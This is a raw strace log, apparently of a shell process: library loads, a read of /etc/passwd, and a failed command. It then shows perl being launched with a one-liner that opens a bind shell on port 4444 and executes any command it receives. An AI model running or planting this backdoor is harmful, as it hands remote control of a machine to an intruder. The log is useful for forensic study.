\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512
11583 20:18:11.298459 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0
11583 20:18:11.298476 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d6b000
11583 20:18:11.298488 mmap2(0xb7d72000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d72000
11583 20:18:11.298506 close(1)          = 0
11583 20:18:11.298518 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11583 20:18:11.298531 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1
11583 20:18:11.298546 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512
11583 20:18:11.298633 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0
11583 20:18:11.298651 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d53000
11583 20:18:11.298662 mmap2(0xb7d67000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d67000
11583 20:18:11.298681 mmap2(0xb7d69000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d69000
11583 20:18:11.298696 close(1)          = 0
11583 20:18:11.298760 munmap(0xb7ef9000, 29913) = 0
11583 20:18:11.298792 open("/etc/ld.so.cache", O_RDONLY) = 1
11583 20:18:11.298805 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
11583 20:18:11.298822 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7ef9000
11583 20:18:11.298832 close(1)          = 0
11583 20:18:11.298843 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11583 20:18:11.298857 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1
11583 20:18:11.298872 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
11583 20:18:11.298962 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0
11583 20:18:11.298980 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d49000
11583 20:18:11.298991 mmap2(0xb7d51000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d51000
11583 20:18:11.299009 close(1)          = 0
11583 20:18:11.299022 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11583 20:18:11.299035 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1
11583 20:18:11.299050 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
11583 20:18:11.299140 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0
11583 20:18:11.299157 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d3e000
11583 20:18:11.299169 mmap2(0xb7d47000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d47000
11583 20:18:11.299185 close(1)          = 0
11583 20:18:11.299216 munmap(0xb7ef9000, 29913) = 0
11583 20:18:11.299256 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1
11583 20:18:11.299285 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)
11583 20:18:11.299302 _llseek(1, 0, [0], SEEK_CUR) = 0
11583 20:18:11.299314 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0
11583 20:18:11.299331 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f00000
11583 20:18:11.299342 _llseek(1, 1624, [1624], SEEK_SET) = 0
11583 20:18:11.299358 munmap(0xb7f00000, 1624) = 0
11583 20:18:11.299368 close(1)          = 0
11583 20:18:11.299397 getpgrp()         = 3831
11583 20:18:11.299408 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0
11583 20:18:11.299423 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0
11583 20:18:11.299439 brk(0x8101000)    = 0x8101000
11583 20:18:11.299472 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11583 20:18:11.299487 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11583 20:18:11.299501 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11583 20:18:11.299538 brk(0x8102000)    = 0x8102000
11583 20:18:11.299565 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
11583 20:18:11.299584 stat64("/sbin/AB", 0xbfa11868) = -1 ENOENT (No such file or directory)
11583 20:18:11.299596 stat64("/bin/AB", 0xbfa11868) = -1 ENOENT (No such file or directory)
11583 20:18:11.299608 stat64("/usr/sbin/AB", 0xbfa11868) = -1 ENOENT (No such file or directory)
11583 20:18:11.299620 stat64("/usr/bin/AB", 0xbfa11868) = -1 ENOENT (No such file or directory)
11583 20:18:11.299633 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
11583 20:18:11.299648 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d746f8) = 11584
11584 20:18:11.299708 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
11584 20:18:11.299748 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
11584 20:18:11.299776 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
11584 20:18:11.299789 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
11584 20:18:11.299805 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
11584 20:18:11.299823 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
11584 20:18:11.299836 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
11584 20:18:11.299906 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)
11584 20:18:11.299920 --- SIGPIPE (Broken pipe) @ 0 (0) ---
11584 20:18:11.299989 exit_group(127)   = ?
11583 20:18:11.601498 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>
4519  20:18:11.601527 waitpid(11583,  <unfinished ...>
11583 20:18:11.601559 <... rt_sigprocmask resumed> NULL, 8) = 0
11583 20:18:11.621457 --- SIGCHLD (Child exited) @ 0 (0) ---
11583 20:18:11.621477 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 11584
11583 20:18:11.621501 waitpid(-1, 0xbfa114e8, WNOHANG) = -1 ECHILD (No child processes)
11583 20:18:11.621513 sigreturn()       = ? (mask now [])
11583 20:18:11.621552 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
11583 20:18:11.621568 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
11583 20:18:11.621579 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
11583 20:18:11.621592 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0
11583 20:18:11.621611 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
11583 20:18:11.621623 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0
11583 20:18:11.621660 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
11583 20:18:11.621681 stat64("/sbin/perl", 0xbfa11898) = -1 ENOENT (No such file or directory)
11583 20:18:11.621694 stat64("/bin/perl", 0xbfa11898) = -1 ENOENT (No such file or directory)
11583 20:18:11.621705 stat64("/usr/sbin/perl", 0xbfa11898) = -1 ENOENT (No such file or directory)
11583 20:18:11.621717 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
11583 20:18:11.621735 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
11583 20:18:11.621761 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
11583 20:18:11.621776 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d746f8) = 11585
11585 20:18:11.721513 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
11585 20:18:11.721550 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
11585 20:18:11.721572 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
11585 20:18:11.721584 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
11585 20:18:11.721601 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
11585 20:18:11.721617 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
11585 20:18:11.721631 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
11585 20:18:11.721670 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0
11585 20:18:11.721771 brk(0)            = 0x8153000
11585 20:18:11.721794 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11585 20:18:11.721811 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef0000
11585 20:18:11.721828 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
11585 20:18:11.721846 open("/etc/ld.so.cache", O_RDONLY) = 1
11585 20:18:11.721860 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
11585 20:18:11.721878 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7ee8000
11585 20:18:11.721888 close(1)          = 0
11585 20:18:11.721912 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11585 20:18:11.721957 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1
11585 20:18:11.721973 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512
11585 20:18:11.722080 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0
11585 20:18:11.722098 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ee4000
11585 20:18:11.722111 mmap2(0xb7ee6000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ee6000
11585 20:18:11.722128 close(1)          = 0
11585 20:18:11.722140 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11585 20:18:11.722154 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1
11585 20:18:11.722168 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512
11585 20:18:11.722260 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0
11585 20:18:11.722278 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ebf000
11585 20:18:11.722289 mmap2(0xb7ee2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7ee2000
11585 20:18:11.722307 close(1)          = 0
11585 20:18:11.722319 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11585 20:18:11.722333 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1
11585 20:18:11.722348 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512
11585 20:18:11.722491 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0
11585 20:18:11.722510 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ebe000
11585 20:18:11.722524 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ea6000
